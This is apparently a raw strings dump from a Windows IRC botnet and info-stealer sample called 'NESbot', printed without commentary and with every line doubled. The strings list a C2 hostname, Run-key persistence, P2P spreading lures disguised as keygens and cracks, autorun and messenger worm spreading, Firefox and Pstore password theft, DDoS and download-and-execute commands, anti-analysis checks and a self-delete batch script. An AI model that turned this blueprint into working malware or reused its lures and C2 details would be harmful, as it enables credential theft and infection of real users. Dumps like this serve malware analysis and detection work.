ping 0.0.0.0>nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
winsvc32.exe
winsvc32.exe
DataBlock.exe
DataBlock.exe
nhg24.zapto.org
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
winsvc32.exe_344:
.text
.text
`.rdata
`.rdata
@.data
@.data
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
EnumWindows
EnumWindows
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
\SonyCam03-2008.zip
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
\temp\syz.tmp
gafgatew.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
Password Cracker.exe
FTP Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C 6 KeyGen.exe
Microsoft Visual C 6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C 2008 KeyGen.exe
Microsoft Visual C 2008 KeyGen.exe
MSN Live Password Cracker.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Keygen
Windows XP Crack.exe
Windows XP Crack.exe
Windows Vista Keygen
Windows Vista Keygen
Widnows Vista Crack.exe
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Generator.exe
Virus Maker.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
%s\%s
keygen
keygen
KeyGen.exe
KeyGen.exe
shlwapi.dll
shlwapi.dll
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\Desktop.ini
\autorun.inf
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d.JPG.scr
%s%d%d%d
%s%d%d%d
KeyGen
KeyGen
mozcrt19.dll
mozcrt19.dll
nspr4.dll
nspr4.dll
plds4.dll
plds4.dll
plc4.dll
plc4.dll
nssutil3.dll
nssutil3.dll
sqlite3.dll
sqlite3.dll
softokn3.dll
softokn3.dll
nss3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
PK11_CheckUserPassword
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
Application Data\Mozilla\Firefox
\profiles.ini
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons1.txt
signons2.txt
signons2.txt
signons3.txt
signons3.txt
pstorec.dll
pstorec.dll
%s %s %s:%s
%s %s %s:%s
http:/
http:/
https:/
https:/
kWindows Security Alert
kWindows Security Alert
SbieDll.dll
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
KERNEL32.DLL
TASKMGR.EXE
TASKMGR.EXE
%s gained access..
%s gained access..
%s did not break in..
%s did not break in..
: %s!%s@%s (PM: "%s")
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s %s out.
%s out.
%s out.
%s error: no user at:
%s error: no user at:
%s invalid slot:
%s invalid slot:
%s kill: threads
%s kill: threads
%s no threads
%s no threads
%s killed thread:
%s killed thread:
%s failed kt:
%s failed kt:
%s %s already running: .
%s %s already running: .
%s faild 2 start %s, err: .
%s faild 2 start %s, err: .
%s status: %s.
%s status: %s.
uptime: %s,
uptime: %s,
for: %s.
for: %s.
%s Bot installed on: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
by: %s!%s@%s
%s Advapi.dll Failed
%s Advapi.dll Failed
%s PStore.dll Failed.
%s PStore.dll Failed.
%s Main thread.
%s Main thread.
%s RuC.
%s RuC.
%s mis paramter[s].
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s spreading disabled.
%s Thread Disabled.
%s Thread Disabled.
FIREFOX Threads
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s unable to start ddos, error: %s
%s %s
%s %s
%s seeding!
%s seeding!
%s unable to download file
%s unable to download file
%s wget: %s location: %s.
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s Downloading update from: %s to: %s.
%s updating from %s
%s updating from %s
%s Couldn't open file for writing: %s.
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error:
%s Couldn't parse path, error:
%s Failed to create process: "%s", error:
%s Failed to create process: "%s", error:
%s Created process: "%s", PID:
%s Created process: "%s", PID:
%s Process Finished: "%s", Total Running Time: %s.
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error:
%s Bad URL or DNS Error, error:
Ping Timeout? (%d-%d)%d/%d
Ping Timeout? (%d-%d)%d/%d
PASS %s
PASS %s
NICK %s
NICK %s
USER NESv5 * 0 :%s
USER NESv5 * 0 :%s
QUIT %s
QUIT %s
JOIN
JOIN
PRIVMSG
PRIVMSG
NICK
NICK
PONG %s
PONG %s
NOTICE %s :%s
NOTICE %s :%s
PRIVMSG %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
MODE %s %s
MODE %s %s
MODE %s %s %s
MODE %s %s %s
Torrent 1.8.1
Torrent 1.8.1
%d.%d.%d.%d
%d.%d.%d.%d
kernel32.dll
kernel32.dll
user32.dll
user32.dll
advapi32.dll
advapi32.dll
RegEnumKeyExA
RegEnumKeyExA
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
FtpGetFileA
FtpGetFileA
FtpPutFileA
FtpPutFileA
InternetOpenUrlA
InternetOpenUrlA
InternetCrackUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
netapi32.dll
netapi32.dll
dnsapi.dll
dnsapi.dll
iphlpapi.dll
iphlpapi.dll
GetTcpTable
GetTcpTable
GetUdpTable
GetUdpTable
mpr.dll
mpr.dll
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
odbc32.dll
odbc32.dll
SQLDriverConnect
SQLDriverConnect
SQLSetEnvAttr
SQLSetEnvAttr
SQLExecDirect
SQLExecDirect
SQLAllocHandle
SQLAllocHandle
SQLFreeHandle
SQLFreeHandle
SQLDisconnect
SQLDisconnect
userenv.dll
userenv.dll
psapi.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
hXXp://VVV.whatismyip.com
%s%%s
%s%%s
%s!%s@%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s too many users logged in.
%s logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
del "%s">nul
del "%s">nul
ping 0.0.0.0>nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
winsvc32.exe
winsvc32.exe
DataBlock.exe
DataBlock.exe
nhg24.zapto.org
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
192.168.11.128
192.168.11.128